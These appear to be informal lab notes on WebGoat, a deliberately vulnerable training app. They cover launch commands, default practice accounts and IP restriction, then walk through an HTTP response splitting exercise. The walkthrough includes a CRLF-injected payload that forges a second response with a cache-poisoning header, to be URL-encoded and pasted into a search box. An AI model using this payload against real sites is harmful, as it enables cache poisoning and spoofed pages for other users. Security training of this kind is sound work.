WebGoat

To start webgoal 6.0.1: $ java -jar WebGoat-6.0.1-war-exec.jar -httpPort 9090

• on linux webgoat.sh start80 or webgoat.sh start8080
• user: guest password: guest
• config file is at /var/lib/tomcat/conf server_80.xml <?>
  • Add these lines to the Host section.

          	<Valve className="org.apache.catalina.valves.RemoteAddrValve"
    	    allow="127.0.0.1,ip1,ip2"/>
    

    nb: this means that only localhost,ip1 and ip2 are permitted to connect.
• other accounts, u:webgoat p:webgoat, u:basic p:basic, u:guest p:guest

This is done with the use of %0d '\r' and %0a '\n'. If server allows it, you can Input url encoded string using the above.

In your Input, say a Searchbox:

1. Make a txt files with: Delete the comments before doing.

       en                  # <- this is the 'normal' text.
       Content-Length: 0
       
       HTTP/1.1 200 OK
       Content-Type: text/html
       Last-Modified: Mon, 29 Apr 2099 03:45:18 GMT   # <- cache poisoning.
       Content-Length: 34
       <html>HTTP Splitting Test</html>
   

1. Then can goto http://yehg.net/encoding/ to URL Encode it.

1. Then cut&paste that encoded string into the Input Searchbox.

Thats it.